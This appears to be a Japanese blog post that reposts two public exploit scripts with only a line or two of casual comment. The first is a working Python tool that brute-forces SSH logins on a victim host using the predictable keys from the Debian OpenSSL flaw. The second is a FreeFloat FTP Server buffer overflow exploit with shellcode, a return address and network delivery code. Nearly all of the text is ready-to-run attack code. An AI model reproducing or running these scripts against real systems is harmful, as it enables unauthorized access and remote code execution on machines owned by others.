新しいソース

#!/bin/python
#       This program is free software; you can redistribute it and/or modify
#       it under the terms of the GNU General Public License as published by
#       the Free Software Foundation; either version 2 of the License, or
#       (at your option) any later version.
#
#       This program is distributed in the hope that it will be useful,
#       but WITHOUT ANY WARRANTY; without even the implied warranty of
#       MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#       GNU General Public License for more details.
#
#       You should have received a copy of the GNU General Public License
#       along with this program; if not, write to the Free Software
#       Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
#       MA 02110-1301, USA.
############################################################################
# Autor: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
#
# 1. Download http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
#
# 2. Extract it to a directory
#
# 3. Execute the python script
#     - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
#     - execute: python exploit.py (without parameters) to display the help
#     - if the key is found, the script shows something like that:
#         Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
#         Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
############################################################################
 
 
import Queue
import os
import string
import time
from threading import Thread
import sys
 
#This class only has a boolean, which will be True if some thread find the key
class End():
    def __init__(self):
        self.end = False
         
    def Finish(self):
        self.end = True
     
    def GetEnd(self):
        return self.end
         
 
#This is the thread class
class Connection(Thread):
    def __init__(self,QueueDir,TheEnd,dir,host,user,port='22'):
        Thread.__init__(self)
        self.QueueDir = QueueDir
        self.TheEnd = TheEnd
        self.dir = dir
        self.host = host
        self.user = user
        self.port = port
             
    def run(self):
        while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):
            key = self.QueueDir.get()
             
            cmd = 'ssh -l ' + self.user
            cmd = cmd + ' -p ' + self.port
            cmd = cmd + ' -o PasswordAuthentication=no'
            cmd = cmd + ' -i ' + self.dir + '/' + key
            cmd = cmd + ' ' + self.host + ' exit; echo $?'
             
            pin,pout,perr = os.popen3(cmd, 'r')
            pin.close()
             
            #To debug descoment the next line. This will show the errors reported by ssh
            #print perr.read()
             
            if pout.read().lstrip().rstrip() == '0':
                self.TheEnd.Finish()
                print ''
                print 'Key Found in file: '+ key
                print 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host)
                print ''
         
print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org'
 
if len(sys.argv) < 4:
    print './exploit.py <dir> <host> <user> [[port] [threads]]'
    print '    <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash'
    print '    <host>: The victim host'
    print '    <user>: The user of the victim host'  
    print '    [port]: The SSH port of the victim host (default 22)'
    print '    [threads]: Number of threads (default 4) Too big numer is bad'
     
    sys.exit(1)
     
dir = sys.argv[1]
host = sys.argv[2]
user = sys.argv[3]
 
if len(sys.argv) <= 4:
      port='22'
      threads=4
else:
    if len(sys.argv) <=5:
        port=sys.argv[4]
        threads = 4
 
    else:
        port=sys.argv[4]   
        threads = sys.argv[5]
 
ListDir = os.listdir(dir)
QueueDir=Queue.Queue()
TheEnd = End()
 
for i in range(len(ListDir)):
    if ListDir[i].find('.pub') == -1:  
        QueueDir.put(ListDir[i])
 
initsize = QueueDir.qsize()
tested = 0
 
for i in range(0,int(threads)):
    Connection(QueueDir,TheEnd,dir,host,user,port).start()
 
 
while (not TheEnd.GetEnd()) and (not QueueDir.empty()):
    time.sleep(5)
    actsize = QueueDir.qsize()
    speed = (initsize - tested - actsize)/5
    tested = initsize - actsize
     
    print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed)
 
# milw0rm.com [2008-06-01]
||< 

これのソースが結構面白そうだから、
最初にどんなソースか読んでみようと思います。

>|python|
#!/usr/bin/python
#
#[+]Exploit Title: FreeFloat FTP Server REST and PASV Buffer Overflow Exploit
#[+]Date: 18\06\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
#[+]Version: 1.00
#[+]Tested On: Windows XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
 
import errno
from os import strerror
from socket import *
import sys
from time import sleep
from struct import pack
 
if len(sys.argv) != 3:
    print "[-]Usage: python %s <ip> <port>" % sys.argv[0]
    print "[-]Exemple: python %s 192.168.1.2 21" % sys.argv[0]
    sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
 
shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"#Shellcode WinExec CALC
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"#Know badchars "\x00\xff\x0d\x0a\x3d\x20"
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
"\x7f\xe8\x7b\xca")
buf = "\x41" * 246
buf += pack('<L',0x7C91FCD8)#JMP ESP in ntdll.dll
buf += "\x90" * 20
buf += shellcode
 
print "[+]Connecting with server..."
sleep(1)
try:
    s = socket(AF_INET,SOCK_STREAM)
    s.connect((ip,port))
    s.recv(2000)
    s.send("USER test\r\n")
    s.recv(2000)
    s.send("PASS test\r\n")
    s.recv(2000)
    s.send("REST "+buf+"\r\n")
    s.close()
    s = socket(AF_INET,SOCK_STREAM)
    s.connect((ip,port))#Server needs connect AGAIN to CRASH and ocorrs the buffer overflow bug.
    sleep(1)#Wait a segund
    s.close()#Close connection CRASH
    print "[+]Exploit sent with sucess"
except:
    print "[*]Error in connection with server: "+ip

これもよさげ。

広告を非表示にする